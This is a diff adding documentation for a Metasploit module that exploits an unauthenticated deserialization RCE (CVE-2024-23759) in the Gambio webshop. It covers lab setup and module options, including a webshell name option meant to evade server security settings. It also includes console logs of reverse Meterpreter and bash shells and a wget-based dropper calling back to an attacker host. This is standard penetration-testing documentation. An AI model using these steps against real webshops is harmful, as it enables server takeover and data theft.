|
| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | +A Remote Code Execution vulnerability in Gambio online webshop version `4.9.2.0` and lower allows remote attackers |
| 4 | +to run arbitrary commands via unauthenticated HTTP POST requests. Gambio version 3 is not vulnerable. |
| 5 | +The identified vulnerability within Gambio pertains to an insecure deserialization flaw, |
| 6 | +which ultimately allows an attacker to execute remote code on affected systems. |
| 7 | + |
| 8 | +The insecure deserialization vulnerability in Gambio poses a significant risk to affected systems. |
| 9 | +As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands, |
| 10 | +potentially resulting in complete system compromise, data exfiltration, or unauthorized access to sensitive information. |
| 11 | + |
| 12 | +This module has been tested with: |
| 13 | +* Gambio online webshop `4.7.2.0` on Ubuntu `22.04` running in VirtualBox `7.0.14 r161095 (Qt5.15.2)`. |
| 14 | + |
| 15 | +## Installation steps to install the Gambio Online Webshop |
| 16 | +* Install your favorite virtualization engine (VMware or VirtualBox) on your preferred platform. |
| 17 | +* Here are the installation instructions for [VirtualBox on MacOS](https://tecadmin.net/how-to-install-virtualbox-on-macos/). |
| 18 | +* Download the Gambio Webshop software from [here](https://www.dmsolutions.de/gambio-download.html). |
| 19 | +* Unzip the package `Gambio v4.7.2.0.zip` and install the Gambio Online Webshop on your Linux Virtual Machine |
| 20 | +* using the installation instructions provided in the ZIP file. Do not use a Windows VM (see Limitations section). |
| 21 | +* When installed, you should be able to access the Webshop either thru `HTTP` port 80 or `HTTPS` port 443 |
| 22 | +* depending on your configuration settings. |
| 23 | + |
| 24 | +You are now ready to test the module. |
| 25 | + |
| 26 | +## Verification Steps |
| 27 | +- [ ] Start `msfconsole` |
| 28 | +- [ ] `use exploit/multi/http/gambio_unauth_rce_cve_2024_23759` |
| 29 | +- [ ] `set rhosts <ip-target>` |
| 30 | +- [ ] `set rport <port>` |
| 31 | +- [ ] `set target <0=PHP, 1=Unix Command, 2=Linux Dropper>` |
| 32 | +- [ ] `exploit` |
| 33 | +- [ ] you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings |
| 34 | + |
| 35 | + |
| 36 | +## Options |
| 37 | + |
| 38 | +### WEBSHELL |
| 39 | +You can use this option to set the filename without extension of the webshell. |
| 40 | +This is handy if you want to test the webshell upload and execution with different file names. |
| 41 | +to bypass any security settings on the Web and PHP server. |
| 42 | + |
| 43 | +### COMMAND |
| 44 | +This option provides the user to choose the PHP underlying shell command function to be used for execution. |
| 45 | +The choices are `system()`, `passthru()`, `shell_exec()` and `exec()` and it defaults to `passthru()`. |
| 46 | +This option is only available when the target selected is either Unix Command or Linux Dropper. |
| 47 | +For the native PHP target, by default the `eval()` function will be used for native PHP code execution. |
| 48 | + |
| 49 | +## Scenarios |
| 50 | +```msf |
| 51 | +msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > info |
| 52 | +
|
| 53 | + Name: Gambio Online Webshop unauthenticated PHP Deserialization Vulnerability |
| 54 | + Module: exploit/multi/http/gambio_unauth_rce_cve_2024_23759 |
| 55 | + Platform: PHP, Unix, Linux |
| 56 | + Arch: php, cmd, x64, x86 |
| 57 | + Privileged: No |
| 58 | + License: Metasploit Framework License (BSD) |
| 59 | + Rank: Excellent |
| 60 | + Disclosed: 2024-01-19 |
| 61 | +
|
| 62 | +Provided by: |
| 63 | + |
| 64 | + usd Herolab |
| 65 | +
|
| 66 | +Module side effects: |
| 67 | + ioc-in-logs |
| 68 | + artifacts-on-disk |
| 69 | +
|
| 70 | +Module stability: |
| 71 | + crash-safe |
| 72 | +
|
| 73 | +Module reliability: |
| 74 | + repeatable-session |
| 75 | +
|
| 76 | +Available targets: |
| 77 | + Id Name |
| 78 | + -- ---- |
| 79 | + => 0 PHP |
| 80 | + 1 Unix Command |
| 81 | + 2 Linux Dropper |
| 82 | +
|
| 83 | +Check supported: |
| 84 | + Yes |
| 85 | +
|
| 86 | +Basic options: |
| 87 | + Name Current Setting Required Description |
| 88 | + ---- --------------- -------- ----------- |
| 89 | + Proxies no A proxy chain of format type:host:port[,type:host:port][...] |
| 90 | + RHOSTS 192.168.201.25 yes The target host(s), see https://docs.metasploit.com/docs/using-metasplo |
| 91 | + it/basics/using-metasploit.html |
| 92 | + RPORT 80 yes The target port (TCP) |
| 93 | + SSL false no Negotiate SSL/TLS for outgoing connections |
| 94 | + SSLCert no Path to a custom SSL certificate (default is randomly generated) |
| 95 | + TARGETURI / yes The Gambia Webshop endpoint URL |
| 96 | + URIPATH no The URI to use for this exploit (default is random) |
| 97 | + VHOST no HTTP server virtual host |
| 98 | + WEBSHELL no Set webshell name without extension. Name will be randomly generated if |
| 99 | + left unset. |
| 100 | +
|
| 101 | +
|
| 102 | + When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http: |
| 103 | +
|
| 104 | + Name Current Setting Required Description |
| 105 | + ---- --------------- -------- ----------- |
| 106 | + SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address |
| 107 | + on the local machine or 0.0.0.0 to listen on all addresses. |
| 108 | + SRVPORT 8080 yes The local port to listen on. |
| 109 | +
|
| 110 | +
|
| 111 | + When TARGET is not 0: |
| 112 | +
|
| 113 | + Name Current Setting Required Description |
| 114 | + ---- --------------- -------- ----------- |
| 115 | + COMMAND passthru yes Use PHP command function (Accepted: passthru, shell_exec, system, exec) |
| 116 | +
|
| 117 | +Payload information: |
| 118 | +
|
| 119 | +Description: |
| 120 | + A Remote Code Execution vulnerability in Gambio online webshop version 4.9.2.0 and lower |
| 121 | + allows remote attackers to run arbitrary commands via unauthenticated HTTP POST request. |
| 122 | + The identified vulnerability within Gambio pertains to an insecure deserialization flaw, |
| 123 | + which ultimately allows an attacker to execute remote code on affected systems. |
| 124 | + The insecure deserialization vulnerability in Gambio poses a significant risk to affected systems. |
| 125 | + As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands, |
| 126 | + potentially resulting in complete system compromise, data exfiltration, or unauthorized access |
| 127 | + to sensitive information. |
| 128 | +
|
| 129 | +References: |
| 130 | + https://nvd.nist.gov/vuln/detail/CVE-2024-23759 |
| 131 | + https://attackerkb.com/topics/cxCsICfcDY/cve-2024-23759 |
| 132 | + https://herolab.usd.de/en/security-advisories/usd-2023-0046/ |
| 133 | +
|
| 134 | +
|
| 135 | +View the full module info with the info -d command. |
| 136 | +``` |
| 137 | + |
| 138 | +### Target 0 - PHP native `php/meterpreter/reverse_tcp` session |
| 139 | +```msf |
| 140 | +msf6 > use exploits/multi/http/gambio_unauth_rce_cve_2024_23759 |
| 141 | +[*] Using configured payload php/meterpreter/reverse_tcp |
| 142 | +msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set rhosts 192.168.201.25 |
| 143 | +rhosts => 192.168.201.25 |
| 144 | +msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set ssl false |
| 145 | +[!] Changing the SSL option's value may require changing RPORT! |
| 146 | +ssl => false |
| 147 | +msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set rport 80 |
| 148 | +rport => 80 |
| 149 | +msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set lhost 192.168.201.8 |
| 150 | +lhost => 192.168.201.8 |
| 151 | +msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > exploit |
| 152 | +
|
| 153 | +[*] Started reverse TCP handler on 192.168.201.8:4444 |
| 154 | +[*] Running automatic check ("set AutoCheck false" to disable) |
| 155 | +[*] Checking if 192.168.201.25:80 can be exploited. |
| 156 | +[+] The target appears to be vulnerable. It looks like Gambio Webshop is running. |
| 157 | +[*] Executing PHP for php/meterpreter/reverse_tcp |
| 158 | +[*] Sending stage (39927 bytes) to 192.168.201.25 |
| 159 | +[+] Deleted GmacadJjQQOXMux.php |
| 160 | +[*] Meterpreter session 1 opened (192.168.201.8:4444 -> 192.168.201.25:60348) at 2024-03-24 09:15:50 +0000 |
| 161 | +
|
| 162 | +meterpreter > sysinfo |
| 163 | +Computer : cuckoo |
| 164 | +OS : Linux cuckoo 5.15.0-101-generic #111-Ubuntu SMP Tue Mar 5 20:16:58 UTC 2024 x86_64 |
| 165 | +Meterpreter : php/linux |
| 166 | +meterpreter > getuid |
| 167 | +Server username: www-data |
| 168 | +meterpreter > pwd |
| 169 | +/var/www |
| 170 | +meterpreter > exit |
| 171 | +``` |
| 172 | + |
| 173 | +### Target 1 - Unix Command `cmd/unix/reverse_bash` session |
| 174 | +```msf |
| 175 | +msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set target 1 |
| 176 | +target => 1 |
| 177 | +msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > exploit |
| 178 | +
|
| 179 | +[*] Started reverse TCP handler on 192.168.201.8:4444 |
| 180 | +[*] Running automatic check ("set AutoCheck false" to disable) |
| 181 | +[*] Checking if 192.168.201.25:80 can be exploited. |
| 182 | +[+] The target appears to be vulnerable. It looks like Gambio Webshop is running. |
| 183 | +[*] Executing Unix Command for cmd/unix/reverse_bash |
| 184 | +[+] Deleted UJoQmnhL.php |
| 185 | +[*] Command shell session 2 opened (192.168.201.8:4444 -> 192.168.201.25:50728) at 2024-03-24 09:17:46 +0000 |
| 186 | +
|
| 187 | +uname -a |
| 188 | +Linux cuckoo 5.15.0-101-generic #111-Ubuntu SMP Tue Mar 5 20:16:58 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux |
| 189 | +id |
| 190 | +uid=33(www-data) gid=33(www-data) groups=33(www-data),29(audio) |
| 191 | +exit |
| 192 | +``` |
| 193 | + |
| 194 | +### Target 2 - Linux Dropper `linux/x64/meterpreter/reverse_tcp` session |
| 195 | +```msf |
| 196 | +msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set target 2 |
| 197 | +target => 2 |
| 198 | +msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > exploit |
| 199 | +
|
| 200 | +[*] Started reverse TCP handler on 192.168.201.8:4444 |
| 201 | +[*] Running automatic check ("set AutoCheck false" to disable) |
| 202 | +[*] Checking if 192.168.201.25:80 can be exploited. |
| 203 | +[+] The target appears to be vulnerable. It looks like Gambio Webshop is running. |
| 204 | +[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp |
| 205 | +[*] Using URL: http://192.168.201.8:8080/ODk0gcrj |
| 206 | +[*] Client 192.168.201.25 (Wget/1.21.2) requested /ODk0gcrj |
| 207 | +[*] Sending payload to 192.168.201.25 (Wget/1.21.2) |
| 208 | +[*] Sending stage (3045380 bytes) to 192.168.201.25 |
| 209 | +[+] Deleted gJlhCqCPLrR.php |
| 210 | +[*] Meterpreter session 3 opened (192.168.201.8:4444 -> 192.168.201.25:46426) at 2024-03-24 09:18:23 +0000 |
| 211 | +[*] Command Stager progress - 100.00% done (114/114 bytes) |
| 212 | +[*] Server stopped. |
| 213 | +
|
| 214 | +meterpreter > sysinfo |
| 215 | +Computer : 192.168.201.25 |
| 216 | +OS : Ubuntu 22.04 (Linux 5.15.0-101-generic) |
| 217 | +Architecture : x64 |
| 218 | +BuildTuple : x86_64-linux-musl |
| 219 | +Meterpreter : x64/linux |
| 220 | +meterpreter > getuid |
| 221 | +Server username: www-data |
| 222 | +meterpreter > pwd |
| 223 | +/var/www |
| 224 | +meterpreter > exit |
| 225 | +``` |
| 226 | + |
| 227 | +## Limitations |
| 228 | +Gambio is also supported on Windows systems, however the admin access seems to be broken on the vulnerable versions. |
| 229 | +This causes the exploit not to run successfully. |
| 230 | +Another dependency is that one or more tax countries should be defined in the configuration of the application, otherwise |
| 231 | +guest users can not be created causing the exploit to fail. The default setup of the application has at least one tax country defined. |
0 commit comments